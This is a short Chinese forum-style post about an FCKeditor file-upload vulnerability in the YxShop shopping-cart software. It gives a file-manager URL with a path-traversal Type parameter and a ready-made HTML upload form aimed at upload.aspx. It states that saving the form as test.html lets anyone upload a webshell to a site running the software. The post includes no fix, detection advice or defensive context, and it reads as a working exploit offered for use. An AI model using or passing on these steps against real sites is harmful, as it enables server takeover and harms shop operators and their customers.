YxShop易想购物商城fckeditor上传漏洞

这套程序用的人还是挺多的，公布的漏洞也少，但是fckeditor的漏洞很多。

这套程序用的还是比较老的版本fckeditor.可以直接上传webshell。连IIS

解析漏洞多省了。

测试如下：

http://www.xx.com/controls/fckeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/aspx/connector.aspx

要是connector.aspx被删的话。可用以下代码。

<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxx.com/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">
Upload a new file:<br>
<input type="file" name="NewFile" size="50"><br>
<input id="btnUpload" type="submit" value="Upload">
</form>

把上面代码保存成test.html就可以直接上传sehll了。